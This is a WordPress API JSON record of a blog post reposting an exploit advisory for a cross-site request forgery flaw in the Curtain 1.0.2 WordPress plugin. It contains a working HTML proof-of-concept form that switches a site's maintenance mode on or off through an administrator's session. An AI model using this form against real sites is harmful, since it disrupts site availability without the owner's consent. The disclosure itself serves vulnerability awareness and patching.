{"id":22381,"date":"2022-03-30T20:28:42","date_gmt":"2022-03-30T16:28:42","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166529\/wpcurtain102-xsrf.txt"},"modified":"2022-04-04T10:38:35","modified_gmt":"2022-04-04T06:08:35","slug":"wordpress-curtain-1-0-2-cross-site-request-forgery","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wordpress-curtain-1-0-2-cross-site-request-forgery\/","title":{"rendered":"WordPress Curtain 1.0.2 Cross Site Request Forgery"},"content":{"rendered":"

# Exploit Title: WordPress Plugin curtain 1.0.2 – CSRF
\n# Date: 29-03-2022
\n# Exploit Author: Hassan Khan Yusufzai – Splint3r7
\n# Vendor Homepage: https:\/\/wordpress.org\/plugins\/curtain\/
\n<https:\/\/wordpress.org\/plugins\/amministrazione-aperta\/>
\n# Version: 1.0.2
\n# Tested on: Firefox
\n# Contact me: h [at] spidersilk.com<\/p>\n

## Summary:<\/p>\n

Cross site forgery vulnerability has been identified in curtain
\nWordPress plugin that allows an attacker to to activate or dedicative
\nsites maintenance mode.<\/p>\n

## Vulnerable URL:<\/p>\n

http:\/\/localhost:10003\/wp-admin\/options-general.php?page=curtain&_wpnonce=&mode=
\n<http:\/\/localhost:10003\/wp-admin\/options-general.php?page=curtain&_wpnonce=&mode=0>1<\/p>\n

## CSRF POC Exploit<\/p>\n

“`
\n<html>
\n<body>
\n<form action=”http:\/\/localhost:10003\/wp-admin\/options-general.php”>
\n<input type=”hidden” name=”page” value=”curtain” \/>
\n<input type=”hidden” name=”_wpnonce” value=”” \/>
\n<input type=”hidden” name=”mode” value=”1″ \/>
\n<input type=”submit” value=”Submit request” \/>
\n<\/form>
\n<\/body>
\n<\/html>
\n“`<\/p>\n

– To deactivate change mode value to 0<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: WordPress Plugin curtain 1.0.2 – CSRF # Date: 29-03-2022 # Exploit Author: Hassan Khan Yusufzai – Splint3r7 # Vendor Homepage: https:\/\/wordpress.org\/plugins\/curtain\/ <https:\/\/wordpress.org\/plugins\/amministrazione-aperta\/> # Version: 1.0.2 # Tested on: Firefox # Contact me: h [at] spidersilk.com ## Summary: Cross site forgery vulnerability has been identified in curtain WordPress plugin that allows an attacker …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-22381","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/22381","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=22381"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/22381\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=22381"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=22381"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=22381"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}